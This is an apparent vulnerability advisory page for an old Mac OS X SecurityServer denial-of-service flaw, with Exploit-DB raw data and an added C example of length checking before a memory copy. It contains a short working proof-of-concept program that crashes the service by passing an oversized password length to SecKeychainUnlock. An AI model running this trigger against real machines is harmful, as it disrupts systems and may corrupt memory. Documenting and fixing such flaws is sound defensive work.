Vendor: MacOS X SecurityServer
By: Unknown
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 20
Product Name: MacOS X SecurityServer
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2003-0609
CPE: o:apple:mac_os_x
Platforms Tested: MacOS X

Apple MacOS X SecurityServer Denial of Service Vulnerability

The vulnerability allows a local user to cause a denial of service (DoS) condition on the target system. This can be achieved by specifying a large password for a SecKeychainUnlock() call. The SecurityServer crashes during a memory copy operation, potentially leading to memory corruption. Although unconfirmed, this could potentially allow for the execution of arbitrary code.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/9332/info

Apple MacOS X SecurityServer has been reported prone to a denial of service vulnerability that may be triggered by a local user. The issue may be triggered under certain circumstances when a large password is specified for a SecKeychainUnlock() call.

It has been reported that this activity will cause the SecurityServer to crash. The server appears to crash during a memory copy operation, potentially resulting in memory corruption. This could possibly allow for execution of arbitrary code, though this possibility has not been confirmed. 

#include <Security/Security.h>
int main(int argc, const char *argv[])
{
    SecKeychainRef defaultKeychain;
    SecKeychainCopyDefault(&defaultKeychain);
    SecKeychainLock(defaultKeychain);
    SecKeychainUnlock(defaultKeychain, 0xFFFFFFFF, "password", true);
    return 0;
}
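
The report above attributes the crash to a memory copy driven by a caller-supplied password length. As an added example (not code from the original page or from Apple; the request structure, the 1024-byte cap and all function names are assumptions), a service can check that length against a policy cap, the destination size and the bytes actually received before it copies anything:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_PASSWORD_LEN 1024u  /* assumed policy cap, not an Apple constant */

/* Hypothetical unlock request as a service might receive it from a client. */
struct unlock_request {
    uint32_t declared_len;   /* length field chosen by the client */
    const uint8_t *payload;  /* bytes that actually arrived */
    size_t payload_len;      /* size of the received payload */
};

enum unlock_status {
    UNLOCK_OK = 0, UNLOCK_ERR_ARG, UNLOCK_ERR_TOO_LONG, UNLOCK_ERR_TRUNCATED
};

/* Copy the password into dst only after declared_len has been validated
 * against the cap, the destination size and the received byte count. */
enum unlock_status copy_password(const struct unlock_request *req,
                                 uint8_t *dst, size_t dst_size, size_t *out_len)
{
    if (req == NULL || dst == NULL || out_len == NULL ||
        (req->payload == NULL && req->declared_len != 0))
        return UNLOCK_ERR_ARG;
    if (req->declared_len > MAX_PASSWORD_LEN || req->declared_len > dst_size)
        return UNLOCK_ERR_TOO_LONG;   /* reject before any copy happens */
    if ((size_t)req->declared_len > req->payload_len)
        return UNLOCK_ERR_TRUNCATED;  /* client claims more than it sent */
    if (req->declared_len != 0)
        memcpy(dst, req->payload, req->declared_len);
    *out_len = req->declared_len;
    return UNLOCK_OK;
}

/* Constructed sample: an 8-byte password with a caller-chosen length field. */
enum unlock_status check_sample(uint32_t declared_len)
{
    static const uint8_t pw[] = "password";
    struct unlock_request req = { declared_len, pw, sizeof pw - 1 };
    uint8_t dst[MAX_PASSWORD_LEN];
    size_t n = 0;
    return copy_password(&req, dst, sizeof dst, &n);
}
```

With the length value from the report (0xFFFFFFFF) the request is rejected at the cap check, and a length that exceeds the bytes actually supplied is rejected as truncated.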